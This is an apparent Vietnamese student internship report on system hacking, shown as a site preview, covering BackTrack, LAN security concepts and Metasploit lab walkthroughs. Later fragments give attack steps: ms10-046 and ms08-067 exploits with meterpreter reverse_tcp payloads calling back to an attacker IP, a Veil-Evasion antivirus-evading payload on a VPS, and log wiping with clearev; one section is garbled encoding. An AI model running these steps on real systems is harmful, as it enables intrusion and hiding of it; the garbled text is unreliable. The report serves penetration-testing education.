Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống
1
/ 37 trang
THÔNG TIN TÀI LIỆU
Thông tin cơ bản
Định dạng
Số trang
37
Dung lượng
3,24 MB
Nội dung
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA Contents ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA CHƯƠNG I. GIỚI THIỆU VỀ BACKTRACK 5 I. Giới thiệu Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử nghiệm thâm nhập.Trong các định dạng Live DVD, chúng ta sử dụng có thể Backtrack trực tiếp từ đĩa DVD mà không cần cài nó vào máy của chúng ta. Backtrack cũng có thể được cài đặt vào ổ cứng và sử dụng như một hệ điều hành. Backtrack là sự hợp nhất giữa 3 bản phân phối khác nhau của Linux về thâm nhập thử nghiệm - IWHAX, WHOPPIX, và Auditor. Trong phiên bản hiện tại của nó (5), Backtrack được dựa trên phiên bản phân phối Linux Ubuntu 11.10. Tính đến ngày 19 tháng bảy năm 2010, Backtrack 5 đã được tải về của hơn 1,5 triệu người sử dụng. Phiên bản mới nhất là Backtrack 5 R2 II. Mục đích Công cụ Backtrack đã có lịch sử phát triển khá lâu qua nhiều bản linux khác nhau. Phiên bản hiện nay sử dụng bản phân phối Slackware linux (Tomas M. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA (www.slax . org)). Backtrack liên tục cập nhật các công cụ, drivers, hiện tại Backtrack có trên 300 công cụ phục vụ cho việc nghiên cứu bảo mật. Backtrack là sự kết hợp giữa 2 bộ công cụ kiểm thử bảo mật rất nổi tiếng là Whax và Auditor. Backtrack 5 chứa một số công cụ có thể được sử dụng trong quá trình thử nghiệm thâm nhập của chúng ta. Các công cụ kiểm tra thâm nhập trong Backtrack 5,0 có thể được phân loại như sau: Information gathering: loại này có chứa một số công cụ có thể được sử dụng để có được thông tin liên quan đến một mục tiêu DNS, định tuyến, địa chỉ e-mail, trang web, máy chủ mail, và như vậy. Thông tin này được thu thập từ các thông tin có sẵn trên Internet, mà không cần chạm vào môi trường mục tiêu. Network mapping: loại này chứa các công cụ có thể được sử dụng để kiểm tra các host đang tồn tại, thông tin về OS, ứng dụng được sử dụng bởi mục tiêu, và cũng làm portscanning. Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy các công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng chứa các công cụ để thực hiện và phân tích Server Message Block (SMB) và Simple Network Management Protocol (SNMP). Web application analysis: loại này chứa các công cụ có thể được sử dụng trong theo dõi, giám sát các ứng dụng web ! "#$%!&' "()* *+ ,- ' $& ./"0 '12"0 3)4 5(6#$!!$1 78 "19"/"0$:" *; 72 $6)<"=>?@A4B1C"0$ BD $1- *E F"0BGB B2"0 BF $&!"0$1-(!/ "8) #"#$&H!"+(!/ "8)B1IBGBB2"0BFBD$1-JKLB*EF"0J-'1 $1GB BGB(M1N"0$O.$1P)$&!"0BGB.G)Q"1.FBHR6 & 7 (#0##*B($ !"+S6'1 '1 $1GB BGB (M 1N"078 JKLB $&6)B9T78! BGB.G) $U"1 .FB HR64 B1C"0 $ BD $1- *E F"0 BGB B2"0 BF $&!"0 (!/ "8)J-"3"0B!JVBW6)X"BYB1C"0$B1!BGBJVBW6)X"B!"1P$ "$ " "0 BB#**+ 2"0 BF $&!"0 (!/ "8) *Z BD $1- 0 CT B1C"0 $ $&!"07 [B6)$&OW6)X"$&6)B9T78!BGB.G)Q"1.FBHR61C"0$BD $1-B:"J-BDJKLB"1\"0JVBW6)X"B!"1P$$&K]B'1 BGBB1C"0$BD $1-B8 JV$B2"0BFJ-6)$&OW6)X"$&6)B9T ^ ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA _! B#7#&?=_?A+,-T13"QB1_?B1C"0$BD$1-*EF"0BGBB2"0 BF$&!"0$1-(!/ "8) @ 0 $(`!&#"* B*+&!"0(!/ "8)4B1C"0$BD$1-a.$1P).b$*;B2"0BF BD$1-JKLB*EF"0J-(8.T13"QB1'c$169$"1KBDJKLB1O"1d"1Je BI"04BP6$&CBBGB$9T$ "478T13"QB11O"1d"1JeBI"0,-*EF"0BGB B2"0BFB6"0BPT$&!"0$1-(!/ "8)4B1C"0$BD$1-B1f"S$&$B'$&B' >!&#"* B*$&!"0$&O"1Jg"'1h Jb"0,2 '1 *ZJi 1j B1C"0$T1d 0k" '<$"b 5bJeBI"078BGB$9T$ "$&!JN $&!"0B1<JbB1lJfBJ-5d!$m" Q"1$!8"7n"#7#&*##"0 "##& "0+1-(!/ "8)B1IBGBB2"0BFBD$1- JKLB*EF"0J- 0o&; B1Kg"0$&O"1.b$1!VB$1G!&p .b$$9TH"$1qB $1 CHƯƠNG 2. TÌNH HÌNH BẢO MẬT MẠNG LAN HIỆN NAY I. Giới thiệu "" "1"$!8"./"0.G)$U"11!8"$!8"(87P"JXB!""0Kp 4!JD7 [BJK& .b$18"1("0T1GT(r78BGBW6)"06)R"$kB(8.7 [BBF$1-(8B:"$1 <$sJ3)4 18"1("0T1GT(rBD$1-0m.+BGBJ X6'1!d"$&!"05b(69$BY"18"K]B4BGB7t" 5d"K] (69$4 i" BGB W6) Ju"1 BD $1- ! $v"0 $N B1IB JV$ & B1! T1w 1LT 7] $v"0JVBJ & R"0GBW6)Ju"1BD$1-"1K+W6)Ju"17X"13"*q47 [B*EF"0 .G)4*EF"0T1:".X.4_8"1K79)4*Z1 [6W6d"1P$$&!"07 [BJd.5d!"" "1 "$!8" B1! 1[ $1;"0 ./"0 .G) Q"1 .b$ '1 $$1qB 1 [" $& [$J- 0 d T1GT 7XB1U"1*GB1B!""0Kp D.(/ 47P"JX"" "1"$!8"./"0.G)$U"1(8.b$7P" JX(]"4"D)R6B:6B:"T1d BD.b$0 d T1GT$N"0$1-4'12"0B1lT1:".X.4T1:" BI"0.G)Q"1.8"DJi 1j Bd7P"JXB1U"1*GB17XB!""0Kp _87P"JX"8)B:" T1d JKLB$1qB1 [".b$BGB1$1Kp"0x6)R"( R"$FB4'12"05!0 p$& [$J-JKLB7O "D(62""d)* "1$1#!$1p 0 "6)"1 R"45y"0BGB0 d T1GT$N"0$1-1LT(r4JVB 5 [$(80 d W6)<$ $;$ 7P" JX B1U"1 *GB1 7X B!" "0Kp $ BD $1- $/! & B1! .O"1 *q "$!8"B1kBB1k"1g" II. Vấn đề bảo mật hệ thống và mạng Các vấn dề chung về bảo mật hệ thống và mạng Đặc điểm chung của một hệ thống mạng là có nhiều người sử dụng chung và phân tán về mặt địa lý nên việc bảo vệ tài nguyên (mất mát hoặc sử z ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA dụng không hợp lệ) phức tạp hơn nhiều so với việc môi trường một máy tính đơn lẻ, hoặc mộtngười sử dụng.Hoạt động của người quản trị hệ thống mạng phải đảm bảo các thông tin trên mạng là tin cậy và sử dụng đúng mục đích, đối tượng đồng thời đảm bảo mạng hoạt động ổn định không bị tấn công bởi những kẻ phá hoại. Nhưng trên thực tế là không một mạng nào đảm bảo là an toàn tuyệt đối, một hệ thống dù được bảo vệ chắc chắn đến mức nào thì cũng có lúc bị vô hiệu hóa bởi những kẻ có ý đồ xấu. Một số khái niệm và lịch sử bảo mật hệ thống a) Đối tượng tấn công mạng (intruder) Đối tượng là những cá nhân hoặc tổ chức sử dụng những kiến thức về mạng và các công cụ phá hoại (gồm phần cứng hoặc phần mềm) để dò tìm các điểm yếu và các lỗ hổng bảo mật trên hệ thống, thực hiện các hoạt động xâm nhập và chiếm đoạt tài nguyên trái phép.Một số đối tượng tấn công mạng như:Hacker: là những kẻ xâm nhập vào mạng trái phép bằng cách sử dụng các công cụ phá mật khẩu hoặc khai thác các điểm yếu của thành phần truy nhập trên hệ thống Masquerader : Là những kẻ giả mạo thông tin trên mạng như giả mạo địa chỉ IP, tên miền, định danh người dùng…Eavesdropping: Là những đối tượng nghe trộm thông tin trên mạng, sử dụngcác công cụ Sniffer, sau đó dùng các công cụ phân tích và debug để lấy được các thông tin có giá trị. Những đối tượng tấn công mạng có thể nhằm nhiều mục đích khác nhau như ăn cắp các thông tin có giá trị về kinh tế, phá hoại hệ thống mạng có chủ định, hoặc có thể đó là những hành động vô ý thức… b) Các lỗ hổng bảo mật Các lỗ hổng bảo mật là những điểm yếu trên hệ thống hoặc ẩn chứa trong một dịch vụ mà dựa vào đó kẻ tấn công có thể xâm nhập trái phép vào hệ thống để thực hiện những hành động phá hoại chiếm đoạt tài nguyên bất hợp pháp.Có nhiều nguyên nhân gây ra những lỗ hổng bảo mật: có thể do lỗi của bản thân hệ thống, hoặc phần mềm cung cấp hoặc người quản trị yếu kém không hiểu sâu về các dịch vụ cung cấp…Mức độ ảnh hưởng của các lỗ hổng tới hệ thống là khác nhau. Có lỗ hổngchỉ ảnh hưởng tới chất lượng dịch vụ cung cấp, có lỗ hổng ảnh hưởng tới toàn bộ hệ thống hoặc phá hủy hệ thống c) Chính sách bảo mật { ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA Chính sách bảo mật là tập hợp các quy tắc áp dụng cho những người tham gia quản trị mạng, có sử dụng các tài nguyên và các dịch vụ mạng. Đối với từng trường hợp phải có chính sách bảo mật khác nhau. Chính sách bảo mật giúp người sử dụng biết trách nhiệm của mình trong việc bảo vệ các tài nguyên trên mạng, đồng thời còn giúp cho nhà quản trị mạng thiết lập các biên pháp đảm bảo hữu hiệu trong quá trình trang bị, cấu hình và kiểm soát hoạt động của hệ thống và mạng. Các loại lỗ hổng bảo mật và phương thức tấn công mạng chủ yếu a) Các loại lỗ hổng Có nhiều các tổ chức đã tiến hành phân loại các dạng lỗ hổng đặc biệt. Theo bộ quốc phòng Mỹ các loại lỗ hổng được phân làm ba loại như sau: Lỗ hổng loại C Cho phép thực hiện các hình thức tấn công theo DoS(Denial of Services- Từ chối dịch vụ) Mức độ nguy hiểm thấp chỉ ảnh hưởng tới chất lượng dịch vụ, làm ngưng trệ, gián đoạn hệ thống, không làm phá hỏng dữ liệuhoặc đạt được quyền truy cập bất hợp pháp.DoS là hình thức tấn công sử dụng các giao thức ở tầng Internet trong bộ giao thức TCP/IP để làm hệ thống ngưng trệ dẫn đến tình trạng từ chối người sử dụng hợp pháp truy nhập hay sử dụng hệ thống.Các dịch vụ có lỗ hổng cho phép các cuộc tấn công DoS có thể được nângcấp hoặc sửa chữa bằng các phiên bản mới hơn của các nhàcung cấp dịch vụ. Hiệnnay chưa có một biện pháp hữu hiệu nào để khắc phục tình trạng tấn công kiểu nàyvì bản thân thiết kế ở tầng Internet (IP) nói riêng và bộ giao thức TCP/IP nói chungđã ẩn chứa những nguy cơ tiềm tang của các lỗ hổng loại này. Lỗ hổng loại B: Cho phép người sử dụng có thêm các quyền trên hệ thống mà không cần kiểm tra tính hợp lệ dẫn đến mất mát thông tin yêu cầu cần bảo mật.Lỗ hổng này thường có trong các ứng dụng trên hệ thống . Có mức độ nguy hiểm là trung bình.Lỗ hổng loại B này có mức độ nguy hiểm hơn lỗ hổng loại C. Cho phép người sử dụng nội bộ có thể chiếm được quyền cao hơn hoặc truy nhập không hợp pháp. | ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA Những lỗ hổng loại này thường xuất hiện trong các dịch vụ trên hệ thống. Ngườ sử dụng local được hiểu là người đã có quyền truy nhập vào hệ thống với một số quyền hạn nhất định. Tìm hiểu vấn đề bảo mật mạng LAN. Một dạng khác của lỗ hổng loại B xảy ra với các chương trình viết bằng mã nguồn C. Những chương trình viết bằng mã nguồn C thường sử dụng một vùng đệm, một vùng trong bộ nhớ sử dụng để lưu trữ dữ liệu trước khi xử lý. Người lập trình thường sử dụng vùng đệm trong bộ nhớ trước khi gán một khoảng không gian bộ nhớ cho từng khối dữ liệu. Ví dụ khi viết chương trình nhập trường tên người sử dụng quy định trường này dài 20 ký tự bằng khai báo:Char first_name [20]; Khai báo này cho phép người sử dụng nhập tối đa 20ký tự. Khi nhập dữ liệu ban đầu dữ liệu được lưu ở vùng đệm. Khi người sử dụng nhập nhiều hơn 20 ký tự sẽ tràn vùng đệm. Những ký tự nhập thừa sẽ nằm ngoàivùng đệm khiến ta không thể kiểm soát được. Nhưng đối với những kẻ tấn côngchúng có thể lợi dụng những lỗ hổng này để nhập vào những ký tự đặc biệt để thực thi một số lệnh đặc biệt trên hệ thống. Thông thường những lỗ hổng này được lợidụng bởi những người sử dụng trên hệ thống để đạt được quyền root không hợp lệ.Để hạn chế được các lỗ hổng loại B phải kiêm soát chặt chẽ cấu hình hệ thống vàcác chương trình. Lỗ hổng loại A Cho phép người ngoài hệ thống có thể truy cập bất hợp pháp vào hệ thống. Có thể làm phá huỷ toàn bộ hệ thống. Loại lỗ hổng này có mức độ rất nguy hiểm đe dọa tính toàn vẹn và bảo mật của hệ thống. Các lỗ hổng này thườngxuất hiện ở những hệ thống quản trị yếu kém hoặc không kiểm soát được cấu hình mạng. Những lỗ hổng loại này hết sức nguy hiểm vì nó đã tồn tại sẵn có trên phần mềm sử dụng, người quản trị nếu không hiểu sâu về dịch vụ và phần mềm sử dụngcó thể bỏ qua điểm yếu này. Vì vậy thường xuyên phải kiểm tra các thông báo của các nhóm tin về bảo mật trên mạng để phát hiện những lỗ hổng loại này. Một loạt các chương trình phiên bản cũ thường sử dụng có những lỗ hổng loại A như: FTP,Gopher, Telnet, Sendmail, ARP, finger. b) Các hình thức tấn công mạng phổ biến Scanner Scanner là một chương trình tự động rà soát và phát hiện những điểm yếu về bảo mật trên một trạm làm việc cục bộ hoặc một trạm ở xa. Một kẻ phá hoại sử dụng chương trình Scanner có thể phát hiện ra những lỗ hổng về bảo mật trên một } ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA Server dù ở xa.Cơ chế hoạt động là rà soát và phát hiện những cổng TCP/UDP được sử dụng trên hệ thống cần tấn công và các dịch vụ sử dụng trên hệ thống đó. Scanner ghi lại những đáp ứng trên hệ thống từ xa tương ứng với dịch vụ mà nó phát hiện ra. Từ đó nó có thể tìm ra điêm yếu của hệ thống. Những yếu tố để một Scanner hoạt động như sau : Yêu cầu thiết bị và hệ thống: Môi trường có hỗ trợ TCP/IP Hệ thống phải kết nối vào mạng Internet.Các chương trình Scanner có vai trò quan trọng trong một hệ thống bảo mật,vì chúng có khả năng phát hiện ra những điểm yếu kém trên một hệ thống mạng. Password Cracker Là một chương trình có khả năng giải mã một mật khẩu đã được mã hoá hoặc có thể vô hiệu hoá chức năng bảo vệ mật khẩu của một hệ thống.Một số chương trình phá khoá có nguyên tắc hoạt động khác nhau. Một số chương trình tạo ra danh sách các từ giới hạn, áp dụng một số thuật toán mã hoá từ kết quả so sánh với Password đã mã hoá cần bẻ khoá để tạo ra một danh sách khác theo một logic của chương trình.Khi thấy phù hợp với mật khẩu đã mã hoá, kẻ phá hoại đã có được mật khẩu dưới dạng text . Mật khẩu text thông thường sẽ được ghi vào một file.Biện pháp khắc phục đối với cách thức phá hoại này là cần xây dựng mộtchính sách bảo vệ mật khẩu đúng đắn. Sniffer Sniffer là các công cụ (phần cứng hoặc phần mềm)”bắt ”các thông tin lưu chuyển trên mạng và lấy các thông tin có giá trị trao đổi trên mạng.Sniffer có thể “bắt” được các thông tin trao đổi giữa nhiều trạm làm việc với nhau. Thực hiện bắt các gói tin từ tầng IP trở xuống. Giao thức ở tầng IP được định nghĩa công khai, và cấu trúc các trường header rõ ràng, nên việc giải mã các gói tin này không khó khăn. Mục đích của các chương trình sniffer đó là thiết lập chế độ promiscuous(mode dùng chung) trên các card mạng ethernet - nơi các gói tin trao đổi trong mạng - từ đó "bắt" được thông tin.Các thiết bị sniffer có thể bắt được toàn bộ thông tin trao đổi trên mạng là dựa vào nguyên tắc broadcast (quảng bá) các gọi tin trong mạng Ethernet.Tuy nhiên việc thiết lập một hệ thống sniffer không phải đơn giản vì cần phải xâm nhập được vào hệ thống mạng đó và cài đặt các phần mềm sniffer.Đồng thời các chương trình sniffer cũng yêu cầu người sử dụng phải hiểu sâu về kiến trúc, các giao thức mạng.Việc phát hiện hệ thống bị sniffer không phải đơn giản, vì sniffer hoạt động ở tầng rất thấp, và không ảnh hưởng tới các ứng dụng cũng như các dịch vụ hệ thống đó cung cấp.Tuy nhiên việc xây dựng các biện ~ [...]... QUANG – BÁO CÁO THỰC TẬP ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA Dùng lệnh exploit để tiến hành tấn công Quá trình tấn công hoàn tất , bây giờ có thể điều khiển được máy victim 30 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA Dùng lệnh screenshot để chup màn hinh victim … và còn nhiều chức năng khác 31 PHẠM HỒNG QUANG – BÁO... HỒNG QUANG – BÁO CÁO THỰC TẬP ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking 2 GVHD : PHẠM VIẾT KHA Các bước tấn công a (mạng LAN) 18 Khởi động Kali Linux và đăng nhập thành công , mở terminal ta được PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA Ta gõ : msfconsole và enter Để dùng mã lỗi ms10-046:search ms10-046 và enter 19 PHẠM HỒNG QUANG – BÁO CÁO... chỉ của máy tấn công vào Type the location of the item: http://192.168.1.35/anythingvà chọn Next 22 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA Đặt tên cho shortcut vừa mới tạo và nhấn Finish Ta sẽ mở shortcut này: Đợi một lát, trên máy tính tấn công ta được: 23 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD... cài đặt lại toàn bộ hệ thống 11 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA CHƯƠNG 3 Tấn Công Hệ Thống System Hacking I Giới Thiệu Về Metasploit 1 Giới Thiệu Metasploit là một dự án bảo mật máy tính cung cấp các thông tin về vấn đề lỗ hổng bảo mật cũng như giúp đỡ về kiểm tra thâm nhập và phát triển hệ thống phát hiện tấn công mạng Một dự án con... “shell” , “ tasklist” để xem Xóa dấu vết sau khi tấn công: (dùng lệnh “clearev”) Mã lỗi ms08_067 Khởi động metasploit và search mã lỗi ms08_067 27 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA Dùng lệnh show option để xem yêu cầu 28 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA Set các giá trị RHOST... THỰC TẬP ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA Tiếp theo ta sẽ o set payload windows/meterpreter/reverse_tcp o set srvhost 192.168.181.128 o Set lhost địa chỉ ip:set lhost 192.168.181.128 lhost là tham số của payload mà ta vừa set ở trên exploit để khởi động server lắng nghe trên máy tấn công 21 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking. .. sữ dụng lệnh : use exploit/multi/hander 33 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA tiếp theo ta sẽ: set payload windows/meterpreter/reverse_tcp show options set lhost - set lhost 162.250.123.132 34 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA ta được giao diện như sau : xong... THỰC TẬP ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA Triễn Khai trên vps Mã hóa bằng Veil b cd Veil-Evasion /Veil-Evasion.py list use python/meterpreter/rev_tcp set LHOST 162.250.123.132 set compile_to exe Y generate *filename* ở đây mình dùng vps linux Ubuntu server download putty.exe và đăng nhập 32 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD...ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA pháp hạn chế sniffer cũng không quá khó khăn nếu ta tuân thủ các nguyên tắc về bảo mật như: Không cho người lạ truy nhập vào các thiết bị trên hệ thống Quản lý cấu hình hệ thống chặt chẽ Thiết lập các kết nối có tính bảo mật cao thông qua các cơ chế mã hoá Trojans Trojans là một chương trình chạy không hợp lệ trên một hệ thống. .. THỰC TẬP ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA Ta gõ tiếp: use exploit/windows/browser/ms10_046_shortcut_icon_dllload và enter 20 Dùng Lệnh show options để xem các tham số cần thiết để có thể tiến hành tấn công được: o SRVHOST: địa chỉ máy của kẻ tấn công, để lắng nghe có nạn nhân nào kết nối đến hay không o SRVPORT: cổng lắng nghe ,mặc định là http(80) PHẠM HỒNG QUANG – BÁO . ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA Contents ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT. cách cài đặt lại toàn bộ hệ thống. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA CHƯƠNG 3. Tấn Công Hệ Thống System Hacking ? Giới Thiệu. } ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA Server dù ở xa.Cơ chế hoạt động là rà soát và phát hiện những cổng TCP/UDP được sử dụng trên hệ thống cần tấn công và